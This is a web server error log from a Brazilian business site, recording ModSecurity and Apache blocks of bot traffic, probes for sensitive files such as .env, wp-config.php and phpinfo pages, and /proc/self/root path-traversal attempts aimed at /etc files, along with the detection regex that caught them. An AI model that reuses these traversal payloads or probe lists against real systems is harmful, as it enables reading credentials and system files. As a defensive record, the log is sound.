[Mon Mar 16 07:09:28.224845 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.244.31:39774] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfW2P9ocpUE4ed4uDzPLQAAAgI"]
[Mon Mar 16 07:17:55.569845 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.228.16:56704] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfY09SswJuvopo3lOhBkgAAAIo"]
[Mon Mar 16 07:20:25.251022 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.244.31:38644] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfZaQlT9VtDQc7bgUyHmwAAAQM"]
[Mon Mar 16 07:23:15.910716 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.228.16:57958] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfaE3jZBu2q05ozVU82VAAAAUk"]
[Mon Mar 16 07:25:46.862180 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.244.31:58474] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfaqglT9VtDQc7bgUyH1QAAAQI"]
[Mon Mar 16 07:28:20.122476 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.228.16:57828] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfbRHbQATo66fKoS7wr6QAAAMw"]
[Mon Mar 16 07:30:51.535345 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.244.31:51102] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfb25qj1wV0Si-OkefKlAAAABM"]
[Mon Mar 16 07:33:47.382962 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.228.16:60074] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfci46lpbStxTqkSktOzAAAAk4"]
[Mon Mar 16 07:36:16.191116 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.244.31:59954] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfdIHbQATo66fKoS7wsIQAAAM8"]
[Mon Mar 16 07:38:55.279867 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.228.16:46834] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfdv_9ocpUE4ed4uDzQvwAAAg4"]
[Mon Mar 16 07:44:18.156698 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.228.16:51998] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abffABXjF1vJNtV6CWrclAAAAcU"]
[Mon Mar 16 07:46:44.823678 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.244.31:52532] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfflLABkC4fWIHEf8HNiAAAAEs"]
[Mon Mar 16 07:49:26.550772 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.228.16:44452] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfgNrysWC90G-1nBrAoIQAAAYw"]
[Mon Mar 16 07:51:47.140802 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.244.31:44808] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfgw_9ocpUE4ed4uDzRFQAAAgM"]
[Mon Mar 16 07:54:48.855715 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.228.16:41708] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfheLABkC4fWIHEf8HOQAAAAFE"]
[Mon Mar 16 07:57:15.905164 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.244.31:59830] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfiC5qj1wV0Si-OkefL1wAAAAY"]
[Mon Mar 16 07:59:55.813187 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.228.16:49834] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfiq3bQATo66fKoS7wtMQAAAMQ"]
[Mon Mar 16 08:00:50.641093 2026] [access_compat:error] [pid 10772:tid 140411599251200] [client 185.177.72.13:15738] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/php-info.php
[Mon Mar 16 08:00:50.858902 2026] [access_compat:error] [pid 10772:tid 140411725141760] [client 185.177.72.13:15738] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/newinfo.php
[Mon Mar 16 08:00:51.061355 2026] [access_compat:error] [pid 10772:tid 140411649607424] [client 185.177.72.13:15738] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/siteinfo.php
[Mon Mar 16 08:00:51.447033 2026] [access_compat:error] [pid 21805:tid 140411599251200] [client 185.177.72.13:15752] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/php-info.php
[Mon Mar 16 08:00:51.638976 2026] [access_compat:error] [pid 21805:tid 140411699963648] [client 185.177.72.13:15752] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/newinfo.php
[Mon Mar 16 08:00:51.842705 2026] [access_compat:error] [pid 21805:tid 140411616036608] [client 185.177.72.13:15752] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/siteinfo.php
[Mon Mar 16 08:00:55.247930 2026] [access_compat:error] [pid 11972:tid 140411548894976] [client 185.177.72.13:38002] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pageinfo.php
[Mon Mar 16 08:00:55.891914 2026] [access_compat:error] [pid 10772:tid 140411565680384] [client 185.177.72.13:38016] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pageinfo.php
[Mon Mar 16 08:00:59.362378 2026] [access_compat:error] [pid 21533:tid 140411716749056] [client 185.177.72.13:38040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/release_info.php
[Mon Mar 16 08:01:00.054618 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:36792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfi7NSswJuvopo3lOhDvQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:01:00.390066 2026] [access_compat:error] [pid 10709:tid 140411741927168] [client 185.177.72.13:38044] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/release_info.php
[Mon Mar 16 08:01:03.776639 2026] [access_compat:error] [pid 21805:tid 140411607643904] [client 185.177.72.13:28898] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 08:01:05.223595 2026] [access_compat:error] [pid 10709:tid 140411674785536] [client 185.177.72.13:28908] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 08:01:13.010262 2026] [access_compat:error] [pid 21946:tid 140411641214720] [client 185.177.72.13:47138] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/_info.php
[Mon Mar 16 08:01:13.211973 2026] [access_compat:error] [pid 21946:tid 140411674785536] [client 185.177.72.13:47138] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/admin_phpinfo.php
[Mon Mar 16 08:01:13.396117 2026] [access_compat:error] [pid 11972:tid 140411741927168] [client 185.177.72.13:47150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/_info.php
[Mon Mar 16 08:01:13.414648 2026] [access_compat:error] [pid 21946:tid 140411733534464] [client 185.177.72.13:47138] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/dbinfo.php
[Mon Mar 16 08:01:13.596901 2026] [access_compat:error] [pid 11972:tid 140411674785536] [client 185.177.72.13:47150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/admin_phpinfo.php
[Mon Mar 16 08:01:13.621800 2026] [access_compat:error] [pid 21946:tid 140411557287680] [client 185.177.72.13:47138] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/admin_info.php
[Mon Mar 16 08:01:13.804629 2026] [access_compat:error] [pid 11972:tid 140411733534464] [client 185.177.72.13:47150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/dbinfo.php
[Mon Mar 16 08:01:14.009891 2026] [access_compat:error] [pid 11972:tid 140411725141760] [client 185.177.72.13:47150] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/admin_info.php
[Mon Mar 16 08:01:15.783809 2026] [access_compat:error] [pid 21946:tid 140411548894976] [client 185.177.72.13:47156] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/config.php
[Mon Mar 16 08:01:15.991215 2026] [access_compat:error] [pid 21946:tid 140411574073088] [client 185.177.72.13:47156] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/phpinfo.php
[Mon Mar 16 08:01:16.099972 2026] [access_compat:error] [pid 21946:tid 140411708356352] [client 185.177.72.13:47160] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/config.php
[Mon Mar 16 08:01:16.310810 2026] [access_compat:error] [pid 21946:tid 140411540502272] [client 185.177.72.13:47160] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/phpinfo.php
[Mon Mar 16 08:01:19.949637 2026] [access_compat:error] [pid 21533:tid 140411658000128] [client 185.177.72.13:47190] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pinfo.php
[Mon Mar 16 08:01:20.644941 2026] [access_compat:error] [pid 10709:tid 140411590858496] [client 185.177.72.13:47204] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pinfo.php
[Mon Mar 16 08:02:04.019666 2026] [access_compat:error] [pid 10709:tid 140411632822016] [client 185.177.72.13:2632] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.php
[Mon Mar 16 08:02:04.994535 2026] [access_compat:error] [pid 21806:tid 140411699963648] [client 185.177.72.13:2638] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.php
[Mon Mar 16 08:02:21.976777 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:44894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfjPbABkC4fWIHEf8HOnQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:02:23.286886 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:34930] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfjP7ABkC4fWIHEf8HOoQAAAEI"]
[Mon Mar 16 08:03:13.006619 2026] [access_compat:error] [pid 10831:tid 140411624429312] [client 185.177.72.13:40586] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.sample.php
[Mon Mar 16 08:03:13.034181 2026] [access_compat:error] [pid 32654:tid 140411624429312] [client 185.177.72.13:40598] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.sample.php
[Mon Mar 16 08:03:22.506250 2026] [access_compat:error] [pid 21533:tid 140411641214720] [client 185.177.72.13:9604] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/env.php
[Mon Mar 16 08:03:22.560567 2026] [access_compat:error] [pid 21533:tid 140411624429312] [client 185.177.72.13:9608] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/env.php
[Mon Mar 16 08:04:16.683891 2026] [access_compat:error] [pid 10651:tid 140411733534464] [client 185.177.72.13:15954] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-config.php
[Mon Mar 16 08:04:16.886162 2026] [access_compat:error] [pid 10651:tid 140411574073088] [client 185.177.72.13:15954] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/configuration.php
[Mon Mar 16 08:04:17.018499 2026] [access_compat:error] [pid 21533:tid 140411699963648] [client 185.177.72.13:15956] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-config.php
[Mon Mar 16 08:04:17.211309 2026] [access_compat:error] [pid 21533:tid 140411599251200] [client 185.177.72.13:15956] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/configuration.php
[Mon Mar 16 08:05:00.190662 2026] [access_compat:error] [pid 11972:tid 140411691570944] [client 185.177.72.13:31106] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.php
[Mon Mar 16 08:05:00.297991 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.228.16:34256] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfj3LysWC90G-1nBrApGQAAAY8"]
[Mon Mar 16 08:05:00.340681 2026] [access_compat:error] [pid 32654:tid 140411649607424] [client 185.177.72.13:31122] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.php
[Mon Mar 16 08:06:07.719316 2026] [access_compat:error] [pid 21533:tid 140411590858496] [client 185.177.72.13:44630] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/_phpinfo.php
[Mon Mar 16 08:06:07.893573 2026] [access_compat:error] [pid 10709:tid 140411574073088] [client 185.177.72.13:44636] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/_phpinfo.php
[Mon Mar 16 08:07:23.788178 2026] [access_compat:error] [pid 10651:tid 140411666392832] [client 185.177.72.13:53678] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pi.php
[Mon Mar 16 08:07:23.838606 2026] [access_compat:error] [pid 11972:tid 140411716749056] [client 185.177.72.13:53680] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pi.php
[Mon Mar 16 08:07:26.132100 2026] [access_compat:error] [pid 10651:tid 140411616036608] [client 185.177.72.13:53684] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test.php
[Mon Mar 16 08:07:26.133335 2026] [access_compat:error] [pid 32654:tid 140411666392832] [client 185.177.72.13:53688] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test.php
[Mon Mar 16 08:07:49.340762 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:55186] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfkhbABkC4fWIHEf8HPIwAAAFU"]
[Mon Mar 16 08:08:28.790567 2026] [access_compat:error] [pid 10651:tid 140411674785536] [client 185.177.72.13:24456] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env_copy
[Mon Mar 16 08:08:28.846186 2026] [access_compat:error] [pid 32654:tid 140411658000128] [client 185.177.72.13:24466] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env_copy
[Mon Mar 16 08:10:00.150767 2026] [authz_core:error] [pid 21805:tid 140411725141760] [client 185.177.72.13:38136] AH01630: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess
[Mon Mar 16 08:10:00.367542 2026] [authz_core:error] [pid 21806:tid 140411632822016] [client 185.177.72.13:38148] AH01630: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess
[Mon Mar 16 08:10:45.396948 2026] [access_compat:error] [pid 21806:tid 140411658000128] [client 185.177.72.13:13866] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/123.php
[Mon Mar 16 08:10:48.356970 2026] [access_compat:error] [pid 21805:tid 140411666392832] [client 185.177.72.13:13876] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/123.php
[Mon Mar 16 08:11:33.898018 2026] [access_compat:error] [pid 21946:tid 140411624429312] [client 185.177.72.13:11040] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/a.php
[Mon Mar 16 08:11:35.835618 2026] [access_compat:error] [pid 10831:tid 140411649607424] [client 185.177.72.13:11048] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/a.php
[Mon Mar 16 08:12:06.154573 2026] [access_compat:error] [pid 21533:tid 140411540502272] [client 185.177.72.13:24890] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/adminer.php
[Mon Mar 16 08:12:17.666745 2026] [access_compat:error] [pid 21946:tid 140411691570944] [client 185.177.72.13:57352] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/apache.php
[Mon Mar 16 08:12:37.617849 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:49162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflpbysWC90G-1nBrApiwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:12:38.940350 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:58738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflphXjF1vJNtV6CWreegAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:12:40.783608 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.241.46:57262] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflqHbQATo66fKoS7wuGQAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:12:42.115345 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:51532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abflqtSswJuvopo3lOhEuQAAAI4"], referer: 